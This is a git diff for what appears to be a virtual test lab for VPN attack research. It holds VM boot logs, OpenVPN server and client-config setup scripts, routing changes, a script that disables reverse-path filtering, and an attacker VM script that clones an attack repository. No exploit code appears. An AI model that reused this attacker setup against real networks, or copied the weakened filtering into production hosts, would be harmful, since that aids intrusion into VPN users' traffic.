systemd[1]: Set hostname to . -[ 11.612942] random: nonblocking pool is initialized -[ 11.808150] systemd[1]: Reached target Swap. -[ OK ] Reached target Swap. -[ 11.819421] systemd[1]: Listening on udev Control Socket. -[ OK ] Listening on udev Control Socket. -[ 11.850068] systemd[1]: Reached target User and Group Name Lookups. -[ OK ] Reached target User and Group Name Lookups. -[ 11.934451] systemd[1]: Reached target Encrypted Volumes. -[ OK ] Reached target Encrypted Volumes. -[ 11.941003] systemd[1]: Listening on udev Kernel Socket. -[ OK ] Listening on udev Kernel Socket. -[ 11.955528] systemd[1]: Created slice User and Session Slice. -[ OK ] Created slice User and Session Slice. -[ 11.958431] systemd[1]: Listening on LVM2 poll daemon socket. -[ OK ] Listening on LVM2 poll daemon socket. -[ 12.012300] systemd[1]: Crete sic System Slice. - -[ OK ] Created slice System Slice. -[ 12.285521] systemd[1]: Created slice system-serial\x2dgetty.slice. -[ OK ] Created slice system-serial\x2dgetty.slice. -[ 12.299640] systemd[1]: Rched tget Slices. - -[ OK ] Reached target Slices. -[ 12.418492] systemd[1]: Listening on Journal Socket. -[ OK ] Listening on Journal Socket. -[ 12.467279] systemd[1]: Starting Load Kernel Modules... - Starting Load Kernel Modules... -[ 12.513443] Loading iSCSI transport class v2.0-870. -[ 12.521364] systemd[1]: Mounting Huge Pages File System... - Mounting Huge Pages File System... -[ 12.554444] systemd[1]: Starting Create list of required static device nodes for the current kernel... - Starting Create list of required st... nodes for the current kernel... -[ 12.654166] systemd[1]: Starting Remount Root and Kernel File Systems... -[ 12.714486] iscsi: registered transport (tcp) -[ 12.767083] EXT4-fs (sda1): re-mounted. Opts: (null) - Starting Remount Root and Kernel File Systems... -[ 12.791368] systemd[1]: Starting Nameserver information manager... - Starting Nameserver information manager... -[ 12.860322] systemd[1]: Mounting POSIX Message Queue File System... - Mounting POSIX Message Queue File System... -[ 12.878533] systemd[1]: Listening on Journal Socket (/dev/log). -[ OK ] Listening on Journal Socket (/dev/log). -[ 12.907524] systemd[1]: Listening on Syslog Socket. -[ OK ] Listening on Syslog Socket. -[ 12.922375] systemd[1]: Started Forward Password Requests to Wall Directory Watch. -[ OK ] Started Forward Password Requests to Wall Directory Watch. -[ 12.942504] systemd[1]: Listening on Device-mapper event daemon FIFOs. -[ OK ] Listening on Device-mapper event daemon FIFOs. -[ 12.971063] systemd[1]: Mounting Debug File System... - [ 12.987005] iscsi: registered transport (iser) -Mounting Debug File System... -[ 13.023618] systemd[1]: Listening on Journal Audit Socket. -[ OK ] Listening on Journal Audit Socket. -[ 13.095237] systemd[1]: Starting Journal Service... - Starting Journal Service... -[ 13.118278] systemd[1]: Starting Set console keymap... - Starting Set console keymap... -[ 13.151542] systemd[1]: Set up automount Arbitrary Executable File Formats File System Automount Point. -[ OK ] Set up automount Arbitrary Executab...ats File System Automount Point. -[ 13.207456] systemd[1]: Starting Uncomplicated firewall... - Starting Uncomplicated firewall... -[ 13.262764] systemd[1]: Listening on LVM2 metadata daemon socket. -[ OK ] Listening on LVM2 metadata daemon socket. -[ 13.303303] systemd[1]: Starting Monitoring of LVM2 mirrors, snapshots etc. using dmeventd or progress polling... - Starting Monitoring of LVM2 mirrors... dmeventd or progress polling... -[ 13.371604] systemd[1]: Reached target System Time Synchronized. -[ OK ] Reached target System Time Synchronized. -[ 13.393524] systemd[1]: Listening on /dev/initctl Compatibility Named Pipe. -[ OK ] Listening on /dev/initctl Compatibility Named Pipe. -[ 13.439303] systemd[1]: Started Trigger resolvconf update for networkd DNS. -[ OK ] Started Trigger resolvconf update for networkd DNS. -[ 13.480178] systemd[1]: Mounted Debug File System. -[ OK ] Mounted Debug File System. -[ 13.490401] systemd[1]: Mounted Huge Pages File System. -[ OK ] Mounted Huge Pages File System. -[ 13.544095] systemd[1]: Mounted POSIX Message Queue File System. -[ OK ] Mounted POSIX Message Queue File System. -[ 13.570103] systemd[1]: Started Journal Service. -[ OK ] Started Journal Service. -[ OK ] Started Load Kernel Modules. -[ OK ] Started Create list of required sta...ce nodes for the current kernel. -[ OK ] Started Remount Root and Kernel File Systems. -[ OK ] Started Set console keymap. -[ OK ] Started Uncomplicated firewall. -[ OK ] Started Nameserver information manager. -[ OK ] Started LVM2 metadata daemon. - Starting Load/Save Random Seed... - Starting udev Coldplug all Devices... - Starting Create Static Device Nodes in /dev... - Mounting FUSE Control File System... - Starting Apply Kernel Variables... - Starting Flush Journal to Persistent Storage... -[ OK ] Mounted FUSE Control File System. -[ OK ] Started Monitoring of LVM2 mirrors,...ng dmeventd or progress polling. -[ OK ] Started Load/Save Random Seed. -[ OK ] Started Create Static Device Nodes in /dev. -[ OK ] Started Apply Kernel Variables. - Starting udev Kernel Device Manager... -[ OK ] Reached target Local File Systems (Pre). -[ OK ] Reached target Local File Systems. - Starting LSB: AppArmor initialization... - Starting Set console font and keymap... - Starting Tell Plymouth To Write Out Runtime Data... - Starting Initial cloud-init job (pre-networking)... -[ OK ] Started udev Kernel Device Manager. -[ OK ] Started udev Coldplug all Devices. -[ OK ] Started Tell Plymouth To Write Out Runtime Data. -[ OK ] Started Dispatch Password Requests to Console Directory Watch. -[ OK ] Started Flush Journal to Persistent Storage. - Starting Create Volatile Files and Directories... -[ OK ] Started Create Volatile Files and Directories. -[ OK ] Started LSB: AppArmor initialization. -[ OK ] Found device /dev/ttyS0. -[ OK ] Listening on Load/Save RF Kill Switch Status /dev/rfkill Watch. - Starting Load AppArmor profiles managed internally by snapd... - Starting Update UTMP about System Boot/Shutdown... -[ OK ] Started Load AppArmor profiles managed internally by snapd. -[ OK ] Started Set console font and keymap. -[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). -[ OK ] Started Update UTMP about System Boot/Shutdown. -[ OK ] Created slice system-getty.slice. -[ 17.363569] cloud-init[502]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init-local' at Mon, 25 Jan 2021 22:38:31 +0000. Up 16.36 seconds. -[ OK ] Started Initial cloud-init job (pre-networking). -[ OK ] Reached target Network (Pre). -[ OK ] Started ifup for enp0s3. -[ OK ] Started ifup for enp0s8. - Starting Raise network interfaces... -[ OK ] Started Raise network interfaces. -[ OK ] Reached target Network. - Starting Initial cloud-init job (metadata service crawler)... -[ 19.628876] cloud-init[1092]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init' at Mon, 25 Jan 2021 22:38:33 +0000. Up 19.00 seconds. -[ 19.636441] cloud-init[1092]: ci-info: ++++++++++++++++++++++++++++++++++++++Net device info++++++++++++++++++++++++++++++++++++++ -[ 19.656534] cloud-init[1092]: ci-info: +--------+------+----------------------------+---------------+--------+-------------------+ -[ 19.732641] cloud-init[1092]: ci-info: | Device | Up | Address | Mask | Scope | Hw-Address | -[ 19.732927] cloud-init[1092]: ci-info: +--------+------+----------------------------+---------------+--------+-------------------+ -[ 19.733104] cloud-init[1092]: ci-info: | enp0s3 | True | 10.0.2.15 | 255.255.255.0 | global | 02:83:3c:85:18:ff | -[ OK ] Started Initial cloud-init job (metadata service crawler). -[ 19.733424] cloud-init[1092]: ci-info: | enp0s3 | True | fe80::83:3cff:fe85:18ff/64 | . | link | 02:83:3c:85:18:ff | -[ 19.904318] cloud-init[1092]: ci-info: | enp0s8 | True | 172.16.4.2 | 255.255.255.0 | global | 08:00:27:61:0b:02 | -[ 19.904644] cloud-init[1092]: ci-info: | enp0s8 | True | fe80::a00:27ff:fe61:b02/64 | . | link | 08:00:27:61:0b:02 | -[ 19.905967] cloud-init[1092]: ci-info: | lo | True | 127.0.0.1 | 255.0.0.0 | host | . | -[ 19.906139] cloud-init[1092]: ci-info: | lo | True | ::1/128 | . | host | . | -[ 19.906328] cloud-init[1092]: ci-info: +--------+------+----------------------------+---------------+--------+-------------------+ -[ 19.906503] cloud-init[1092]: ci-info: +++++++++++++++++++++++++++++Route IPv4 info++++++++++++++++++++++++++++++ -[ 19.906695] cloud-init[1092]: ci-info: +-------+-------------+--------------+---------------+-----------+-------+ -[ 19.906877] cloud-init[1092]: ci-info: | Route | Destination | Gateway | Genmask | Interface | Flags | -[ 19.907071] cloud-init[1092]: ci-info: +-------+-------------+--------------+---------------+-----------+-------+ -[ 19.907303] cloud-init[1092]: ci-info: | 0 | 0.0.0.0 | 10.0.2.2 | 0.0.0.0 | enp0s3 | UG | -[ OK ] Reached target Network is Online. -[ 19.907512] cloud-init[1092]: ci-info: | 1 | 10.0.2.0 | 0.0.0.0 | 255.255.255.0 | enp0s3 | U | -[ 20.232272] cloud-init[1092]: ci-info: | 2 | 172.16.0.0 | 172.16.4.254 | 255.255.0.0 | enp0s8 | UG | -[ 20.232548] cloud-init[1092]: ci-info: | 3 | 172.16.4.0 | 0.0.0.0 | 255.255.255.0 | enp0s8 | U | -[ 20.232713] cloud-init[1092]: ci-info: | 4 | 192.168.0.0 | 172.16.4.254 | 255.255.0.0 | enp0s8 | UG | -[ 20.233114] cloud-init[1092]: ci-info: +-------+-------------+--------------+---------------+-----------+-------+ -[ 20.233245] cloud-init[1092]: ci-info: +++++++++++++++++++Route IPv6 info+++++++++++++++++++ -[ 20.233376] cloud-init[1092]: ci-info: +-------+-------------+---------+-----------+-------+ - Starting iSCSI initiator daemon (iscsid)... -[[ 20.233542] cloud-init[1092]: ci-info: | Route | Destination | Gateway | Interface | Flags | -[ 20.516855] cloud-init[1092]: ci-info: +-------+-------------+---------+-----------+-------+ - OK ] Reached target Cloud-config availability. -[[ 20.516994] cloud-init[1092]: ci-info: | 0 | fe80::/64 | :: | enp0s8 | U | -[ 20.589595] cloud-init[1092]: ci-info: | 1 | fe80::/64 | :: | enp0s3 | U | -[ 20.589712] cloud-init[1092]: ci-info: | 4 | ff00::/8 | :: | enp0s8 | U | - OK ] Reached target System Initialization. -[ 20.589974] cloud-init[1092]: ci-info: | 5 | ff00::/8 | :: | enp0s3 | U | -[ 20.699002] cloud-init[1092]: ci-info: +-------+-------------+---------+-----------+-------+ - Starting LXD - unix socket. -[ OK ] Listening on ACPID Listen Socket. -[ OK ] Started Daily apt download activities. -[ OK ] Listening on D-Bus System Message Bus Socket. -[ OK ] Listening on UUID daemon activation socket. -[ OK ] Started Message of the Day. -[ OK ] Started ACPI Events Check. -[ OK ] Reached target Paths. -[ OK ] Started Daily apt upgrade and clean activities. - Starting Socket activation for snappy daemon. -[ OK ] Started Daily Cleanup of Temporary Directories. -[ OK ] Reached target Timers. -[ OK ] Listening on LXD - unix socket. -[ OK ] Listening on Socket activation for snappy daemon. -[ OK ] Started iSCSI initiator daemon (iscsid). - Starting Login to default iSCSI targets... -[ OK ] Reached target Sockets. -[ OK ] Reached target Basic System. - Starting LSB: MD monitoring daemon... - Starting LXD - container startup/shutdown... -[ OK ] Started Deferred execution scheduler. - Starting Login Service... - Starting Accounts Service... -[ OK ] Started D-Bus System Message Bus. -[ OK ] Started ACPI event daemon. - Starting /etc/rc.local Compatibility... -[ OK ] Started FUSE filesystem for LXC. - Starting System Logging Service... - Starting Virtualbox guest utils... -[ OK ] Started Regular background program processing daemon. - Starting OpenBSD Secure Shell server... - Starting OpenVPN service... - Starting Snap Daemon... - Starting LSB: Record successful boot for GRUB... -[ OK ] Started System Logging Service. -[ OK ] Started LXD - container startup/shutdown. -[ OK ] Started /etc/rc.local Compatibility. -[ OK ] Started OpenVPN service. -[ OK ] Started OpenBSD Secure Shell server. -[ OK ] Started Login to default iSCSI targets. -[ OK ] Started LSB: MD monitoring daemon. -[ OK ] Started Login Service. -[ OK ] Started Unattended Upgrades Shutdown. - Starting Authenticate and Authorize Users to Run Privileged Tasks... -[ OK ] Reached target Remote File Systems (Pre). -[ OK ] Reached target Remote File Systems. - Starting LSB: automatic crash report generation... - Starting LSB: daemon to balance interrupts for SMP systems... - Starting LSB: Set the CPU Frequency Scaling governor to "ondemand"... - Starting Permit User Sessions... -[ OK ] Started LSB: Record successful boot for GRUB. -[ OK ] Started Virtualbox guest utils. -[ OK ] Started Permit User Sessions. - Starting Hold until boot process finishes up... - Starting Terminate Plymouth Boot Screen... -[ OK ] Started Hold until boot process finishes up. -[ OK ] Started Terminate Plymouth Boot Screen. -[ OK ] Started Authenticate and Authorize Users to Run Privileged Tasks. -[ OK ] Started Getty on tty1. -[ OK ] Started Serial Getty on ttyS0. -[ OK ] Reached target Login Prompts. - Starting Set console scheme... -[ OK ] Started LSB: daemon to balance interrupts for SMP systems. -[ OK ] Started Set console scheme. -[ OK ] Started Snap Daemon. -[ OK ] Started Accounts Service. - Starting Wait until snapd is fully seeded... -[ OK ] Started LSB: automatic crash report generation. -[ OK ] Started LSB: Set the CPU Frequency Scaling governor to "ondemand". -[ OK ] Started Wait until snapd is fully seeded. - Starting Apply the settings specified in cloud-config... -[ OK ] Reached target Multi-User System. -[ OK ] Reached target Graphical Interface. - Starting Update UTMP about System Runlevel Changes... -[ OK ] Started Update UTMP about System Runlevel Changes. -[ 25.288210] cloud-init[1355]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:config' at Mon, 25 Jan 2021 22:38:39 +0000. Up 25.00 seconds. -[ OK ] Started Apply the settings specified in cloud-config. - Starting Execute cloud user/final scripts... -[ 26.136818] cloud-init[1371]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:final' at Mon, 25 Jan 2021 22:38:40 +0000. Up 25.89 seconds. -[ 26.162920] cloud-init[1371]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 finished at Mon, 25 Jan 2021 22:38:41 +0000. Datasource DataSourceNoCloud [seed=/dev/sdb][dsmode=net]. Up 26.11 seconds -[ OK ] Started Execute cloud user/final scripts. -[ OK ] Reached target Cloud-init target. - -Ubuntu 16.04.7 LTS client1 ttyS0 - -client1 login: \ No newline at end of file diff --git a/virtual-test-environment/edgers/setups/attacker/setup_attacker.sh b/virtual-test-environment/edgers/setups/attacker/setup_attacker.sh index ce8ac69..854ca05 100755 --- a/virtual-test-environment/edgers/setups/attacker/setup_attacker.sh +++ b/virtual-test-environment/edgers/setups/attacker/setup_attacker.sh @@ -30,4 +30,4 @@ sudo ldconfig echo "Cloning attack repo.." cd ~ pwd -git clone https://git.breakpointingbad.com/Breakpointing-Bad-Public/vpn-attacks-only.git +git clone https://git.breakpointingbad.com/Breakpointing-Bad-Public/vpn-attacks.git diff --git a/virtual-test-environment/edgers/setups/disable_rp_filter.sh b/virtual-test-environment/edgers/setups/disable_rp_filter.sh new file mode 100755 index 0000000..1605f40 --- /dev/null +++ b/virtual-test-environment/edgers/setups/disable_rp_filter.sh @@ -0,0 +1,12 @@ +#!/bin/bash + +printf "Disabling rp filter on local interfaces..\n" + +sudo sysctl -w net.ipv4.conf.all.rp_filter=0 +sudo sysctl -w net.ipv4.conf.default.rp_filter=0 +sudo sysctl -w net.ipv4.conf.enp0s8.rp_filter=0 +sudo sysctl -w net.ipv4.conf.lo.rp_filter=0 + + + + diff --git a/virtual-test-environment/edgers/setups/vpn_server/setup_vpn.sh b/virtual-test-environment/edgers/setups/vpn_server/setup_vpn.sh index 082c28b..d2092c0 100755 --- a/virtual-test-environment/edgers/setups/vpn_server/setup_vpn.sh +++ b/virtual-test-environment/edgers/setups/vpn_server/setup_vpn.sh @@ -21,6 +21,11 @@ sed -i "s/KEY_NAME=\"EasyRSA\"/KEY_NAME=\"server\"/g" vars +sed -i 's/--interact//' build-ca +sed -i 's/--interact//' build-key-server +sed -i 's/--interact//' build-dh +sed -i 's/--interact//' build-key + cd ~/openvpn-ca source vars @@ -98,9 +103,76 @@ sudo ufw allow 443/tcp sudo ufw allow OpenSSH sudo ufw disable -sudo ufw enable +sudo ufw --force enable printf "$BORDER Enabling the openvpn service $BORDER \n\n" sudo systemctl start openvpn@server sudo systemctl enable openvpn@server + + + + + + + + + + + +BORDER=">>>>>>>>>>>>>>>>" + +printf "$BORDER Setting up base client config file\n\n" + +mkdir -p ~/client-configs/files +chmod 700 ~/client-configs/files + + +cp /usr/share/doc/openvpn/examples/sample-config-files/client.conf ~/client-configs/base.conf + + +sed -i "s/my-server-1 1194/192.168.2.2 443/g" ~/client-configs/base.conf +sed -i "s/proto udp/proto tcp/g" ~/client-configs/base.conf + +sed -i "s/;user nobody/user nobody/g" ~/client-configs/base.conf +sed -i "s/;group nobody/group nobody/g" ~/client-configs/base.conf + +sed -i "s/ca ca.crt/# ca ca.crt/g" ~/client-configs/base.conf +sed -i "s/cert client.crt/# cert client.crt/g" ~/client-configs/base.conf +sed -i "s/key client.key/# key client.key/g" ~/client-configs/base.conf + + +cat >> ~/client-configs/base.conf << EOF +cipher AES-128-CBC +auth SHA256 +key-direction 1 +# script-security 2 +# up /etc/openvpn/update-resolv-conf +# down /etc/openvpn/update-resolv-conf +EOF + + +printf "$BORDER Creating make client config script..\n\n" + +touch ~/client-configs/make_config.sh + +cat >> ~/client-configs/make_config.sh << EOF + +# First argument: Client identifier + +KEY_DIR=~/openvpn-ca/keys +OUTPUT_DIR=~/client-configs/files +BASE_CONFIG=~/client-configs/base.conf + +cat \${BASE_CONFIG} <(echo -e '') \${KEY_DIR}/ca.crt <(echo -e '\n') \${KEY_DIR}/\${1}.crt <(echo -e '\n') \${KEY_DIR}/\${1}.key <(echo -e '\n') \${KEY_DIR}/ta.key <(echo -e '') > \${OUTPUT_DIR}/\${1}.ovpn +EOF + +chmod 700 ~/client-configs/make_config.sh + + +printf "$BORDER Making client config file for client1\n\n" + +cd ~/client-configs +./make_config.sh client1 +ls ~/client-configs/files + diff --git a/virtual-test-environment/edgers/vpn-server/.vagrant/machines/default/virtualbox/vagrant_cwd b/virtual-test-environment/edgers/vpn-server/.vagrant/machines/default/virtualbox/vagrant_cwd deleted file mode 100644 index 0c4ee00..0000000 --- a/virtual-test-environment/edgers/vpn-server/.vagrant/machines/default/virtualbox/vagrant_cwd +++ /dev/null @@ -1 +0,0 @@ -/home/jive/space/gittin/VeepExploit/virt-lab/edgers/vpn-server \ No newline at end of file diff --git a/virtual-test-environment/edgers/vpn-server/Vagrantfile b/virtual-test-environment/edgers/vpn-server/Vagrantfile index 2fb2bd7..cecd19f 100644 --- a/virtual-test-environment/edgers/vpn-server/Vagrantfile +++ b/virtual-test-environment/edgers/vpn-server/Vagrantfile @@ -1,12 +1,11 @@ # -*- mode: ruby -*- - # vi: set ft=ruby : Vagrant.configure(2) do |config| config.vm.box = "ubuntu/xenial64" config.vm.hostname = "vague-vpn-server" - config.vm.network "forwarded_port", guest: 22, host: 22112, id: 'ssh' + config.vm.network "forwarded_port", guest: 22, host: 22119, id: 'ssh' config.ssh.insert_key = true config.vm.network "private_network", ip: "192.168.2.2", virtualbox__intnet: "intnet-2" diff --git a/virtual-test-environment/edgers/vpn-server/copy_vpn_setup.sh b/virtual-test-environment/edgers/vpn-server/copy_vpn_setup.sh index 3c11250..432248c 100755 --- a/virtual-test-environment/edgers/vpn-server/copy_vpn_setup.sh +++ b/virtual-test-environment/edgers/vpn-server/copy_vpn_setup.sh @@ -7,7 +7,7 @@ echo Copying vpn setup scripts to vpn VM.. cd ../vpn-server -scp -i .vagrant/machines/default/virtualbox/private_key -P 22112 ../setups/vpn_server/* vagrant@localhost:~ +scp -i .vagrant/machines/default/virtualbox/private_key -P 22119 ../setups/vpn_server/setup* vagrant@localhost:~ diff --git a/virtual-test-environment/edgers/vpn-server/setup_net.sh b/virtual-test-environment/edgers/vpn-server/setup_net.sh index abe5cdd..d5dbe24 100755 --- a/virtual-test-environment/edgers/vpn-server/setup_net.sh +++ b/virtual-test-environment/edgers/vpn-server/setup_net.sh @@ -10,5 +10,6 @@ sed -i "s/$OLD_NAME/$HNAME/g" /etc/hosts hostname $HNAME sed -i "s/#VAGRANT-END/up route add -net 192.168.0.0\/16 gw 192.168.2.254 dev enp0s8/g" /etc/network/interfaces +#sed -i "s/#VAGRANT-END/#up route add default gw 192.168.2.254 dev enp0s8/g" /etc/network/interfaces #/etc/init.d/networking restart exit diff --git a/virtual-test-environment/edgers/vpn-server/ubuntu-xenial-16.04-cloudimg-console.log b/virtual-test-environment/edgers/vpn-server/ubuntu-xenial-16.04-cloudimg-console.log deleted file mode 100644 index b434de9..0000000 --- a/virtual-test-environment/edgers/vpn-server/ubuntu-xenial-16.04-cloudimg-console.log +++ /dev/null @@ -1,653 +0,0 @@ -[ 0.000000] Initializing cgroup subsys cpuset -[ 0.000000] Initializing cgroup subsys cpu -[ 0.000000] Initializing cgroup subsys cpuacct -[ 0.000000] Linux version 4.4.0-190-generic (buildd@lcy01-amd64-026) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12) ) #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 (Ubuntu 4.4.0-190.220-generic 4.4.233) -[ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-4.4.0-190-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0 -[ 0.000000] KERNEL supported cpus: -[ 0.000000] Intel GenuineIntel -[ 0.000000] AMD AuthenticAMD -[ 0.000000] Centaur CentaurHauls -[ 0.000000] x86/fpu: xstate_offset[2]: 576, xstate_sizes[2]: 256 -[ 0.000000] x86/fpu: Supporting XSAVE feature 0x01: 'x87 floating point registers' -[ 0.000000] x86/fpu: Supporting XSAVE feature 0x02: 'SSE registers' -[ 0.000000] x86/fpu: Supporting XSAVE feature 0x04: 'AVX registers' -[ 0.000000] x86/fpu: Enabled xstate features 0x7, context size is 832 bytes, using 'standard' format. -[ 0.000000] e820: BIOS-provided physical RAM map: -[ 0.000000] BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usable -[ 0.000000] BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved -[ 0.000000] BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved -[ 0.000000] BIOS-e820: [mem 0x0000000000100000-0x000000003ffeffff] usable -[ 0.000000] BIOS-e820: [mem 0x000000003fff0000-0x000000003fffffff] ACPI data -[ 0.000000] BIOS-e820: [mem 0x00000000fec00000-0x00000000fec00fff] reserved -[ 0.000000] BIOS-e820: [mem 0x00000000fee00000-0x00000000fee00fff] reserved -[ 0.000000] BIOS-e820: [mem 0x00000000fffc0000-0x00000000ffffffff] reserved -[ 0.000000] NX (Execute Disable) protection: active -[ 0.000000] SMBIOS 2.5 present. -[ 0.000000] Hypervisor detected: KVM -[ 0.000000] e820: last_pfn = 0x3fff0 max_arch_pfn = 0x400000000 -[ 0.000000] MTRR: Disabled -[ 0.000000] x86/PAT: MTRRs disabled, skipping PAT initialization too. -[ 0.000000] CPU MTRRs all blank - virtualized system. -[ 0.000000] x86/PAT: Configuration [0-7]: WB WT UC- UC WB WT UC- UC -[ 0.000000] found SMP MP-table at [mem 0x0009fff0-0x0009ffff] mapped at [ffff88000009fff0] -[ 0.000000] Scanning 1 areas for low memory corruption -[ 0.000000] RAMDISK: [mem 0x362e0000-0x37167fff] -[ 0.000000] ACPI: Early table checksum verification disabled -[ 0.000000] ACPI: RSDP 0x00000000000E0000 000024 (v02 VBOX ) -[ 0.000000] ACPI: XSDT 0x000000003FFF0030 00003C (v01 VBOX VBOXXSDT 00000001 ASL 00000061) -[ 0.000000] ACPI: FACP 0x000000003FFF00F0 0000F4 (v04 VBOX VBOXFACP 00000001 ASL 00000061) -[ 0.000000] ACPI: DSDT 0x000000003FFF0470 0021FF (v02 VBOX VBOXBIOS 00000002 INTL 20180105) -[ 0.000000] ACPI: FACS 0x000000003FFF0200 000040 -[ 0.000000] ACPI: FACS 0x000000003FFF0200 000040 -[ 0.000000] ACPI: APIC 0x000000003FFF0240 00005C (v02 VBOX VBOXAPIC 00000001 ASL 00000061) -[ 0.000000] ACPI: SSDT 0x000000003FFF02A0 0001CC (v01 VBOX VBOXCPUT 00000002 INTL 20180105) -[ 0.000000] No NUMA configuration found -[ 0.000000] Faking a node at [mem 0x0000000000000000-0x000000003ffeffff] -[ 0.000000] NODE_DATA(0) allocated [mem 0x3ffeb000-0x3ffeffff] -[ 0.000000] kvm-clock: Using msrs 4b564d01 and 4b564d00 -[ 0.000000] kvm-clock: cpu 0, msr 0:3ffe3001, primary cpu clock -[ 0.000000] kvm-clock: using sched offset of 4314789818 cycles -[ 0.000000] clocksource: kvm-clock: mask: 0xffffffffffffffff max_cycles: 0x1cd42e4dffb, max_idle_ns: 881590591483 ns -[ 0.000000] Zone ranges: -[ 0.000000] DMA [mem 0x0000000000001000-0x0000000000ffffff] -[ 0.000000] DMA32 [mem 0x0000000001000000-0x000000003ffeffff] -[ 0.000000] Normal empty -[ 0.000000] Device empty -[ 0.000000] Movable zone start for each node -[ 0.000000] Early memory node ranges -[ 0.000000] node 0: [mem 0x0000000000001000-0x000000000009efff] -[ 0.000000] node 0: [mem 0x0000000000100000-0x000000003ffeffff] -[ 0.000000] Initmem setup node 0 [mem 0x0000000000001000-0x000000003ffeffff] -[ 0.000000] ACPI: PM-Timer IO Port: 0x4008 -[ 0.000000] IOAPIC[0]: apic_id 2, version 3, address 0xfec00000, GSI 0-23 -[ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) -[ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 low level) -[ 0.000000] Using ACPI (MADT) for SMP configuration information -[ 0.000000] smpboot: Allowing 2 CPUs, 0 hotplug CPUs -[ 0.000000] PM: Registered nosae mmory: [mem 0x00000000-0x00000fff] -[ 0.000000] PM: Registered nosave memory: [mem 0x0009f000-0x0009ffff] -[ 0.000000] PM: Registered nosave memory: [mem 0x000a0000-0x000effff] -[ 0.000000] PM: Registered nosave memory: [mem 0x000f0000-0x000fffff] -[ 0.000000] e820: [mem 0x40000000-0xfebfffff] available for PCI devices -[ 0.000000] Booting paravirtualized kernel on KVM -[ 0.000000] clocksource: refined-jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645519600211568 ns -[ 0.000000] setup_percpu: NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:2 nr_node_ids:1 -[ 0.000000] PERCPU: Embedded 33 pages/cpu @ffff88003fc00000 s95512 r8192 d31464 u1048576 -[ 0.000000] Built 1 zonelists in Node order, mobility grouping on. Total pages: 257912 -[ 0.000000] Policy zone: DMA32 -[ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-4.4.0-190-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0 -[ 0.000000] PID hash table entries: 4096 (order: 3, 32768 bytes) -[ 0.000000] Memory: 997664K/1048120K available (8636K kernel code, 1337K rwdata, 4040K rodata, 1492K init, 1296K bss, 50456K reserved, 0K cma-reserved) -[ 0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=2, Nodes=1 -[ 0.000000] Kernel/User page tables isolation: enabled -[ 0.000000] Hierarchical RCU implementatin. -[ 0.000000] Build-time adjustment of leaf fanout to 64. -[ 0.000000] RCU restricting CPUs from NR_CPUS=512 to nr_cpu_ids=2. -[ 0.000000] RCU: Adjusting geometry for rcu_fanout_leaf=64, nr_cpu_ids=2 -[ 0.000000] NR_IRQS:33024 nr_irqs:440 16 -[ 0.000000] Console: colour VGA+ 80x25 -[ 0.000000] console [tty1] enabled -[ 0.000000] console [ttyS0] enabled -[ 0.000000] tsc: Detected 2207.998 MHz processor -[ 0.986054] Calibrating delay loop (skipped) preset value.. 4415.99 BogoMIPS (lpj=8831992) -[ 1.025965] pid_max: default: 32768 minimum: 301 -[ 1.027009] ACPI: Core revision 20150930 -[ 1.042513] ACPI: 2 ACPI AML tables successfully acquired and loaded -[ 1.044067] Security Framework initialized -[ 1.045085] Yama: becoming mindful. -[ 1.045982] AppArmor: AppArmor initialized -[ 1.047079] Dentry cache hash table entries: 131072 (order: 8, 1048576 bytes) -[ 1.093990] Inode-cache hash table entries: 65536 (order: 7, 524288 bytes) -[ 1.095587] Mount-cache hash table entries: 2048 (order: 2, 16384 bytes) -[ 1.113859] Mountpoint-cache hash table entries: 2048 (order: 2, 16384 bytes) -[ 1.115552] Initializing cgroup subsys io -[ 1.128391] Initializing cgroup subsys memory -[ 1.138494] Initializing cgroup subsys devices -[ 1.173312] Initializing cgroup subsys freezer -[ 1.174456] Initializing cgroup subsys net_cls -[ 1.175553] Initializing cgroup subsys perf_event -[ 1.176719] Initializing cgroup subsys net_prio -[ 1.183021] Initializing cgroup subsys hugetlb -[ 1.204792] Initializing cgroup subsys pids -[ 1.226730] mce: CPU supports 0 MCE banks -[ 1.238743] Last level iTLB entries: 4KB 64, 2MB 8, 4MB 8 -[ 1.253921] Last level dTLB entries: 4KB 64, 2MB 0, 4MB 0, 1GB 4 -[ 1.255194] Spectre V1 : Mitigation: usercopy/swapgs barriers and __user pointer sanitization -[ 1.258138] Spectre V2 : Mitigation: Full generic retpoline -[ 1.268550] Spectre V2 : Spectre v2 / SpectreRSB mitigation: Filling RSB on context switch -[ 1.297390] Speculative Store Bypass: Vulnerable -[ 1.298981] SRBDS: Unknown: Dependent on hypervisor status -[ 1.300585] MDS: Mitigation: Clear CPU buffers -[ 1.307062] Freeing SMP alternatives memory: 36K -[ 1.315697] ftrace: allocating 32339 entries in 127 pages -[ 1.430735] smpboot: APIC(0) Converting physical 0 to logical package 0 -[ 1.443667] smpboot: Max logical packages: 1 -[ 1.457672] x2apic enabled -[ 1.458916] Switched APIC routing to physical x2apic. -[ 1.461522] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1 -[ 1.571387] smpboot: CPU0: Intel(R) Core(TM) i3-8130U CPU @ 2.20GHz (family: 0x6, model: 0x8e, stepping: 0xa) -[ 1.583194] Performance Events: unsupported p6 CPU model 142 no PMU driver, software events only. -[ 1.628853] KVM setup paravirtual 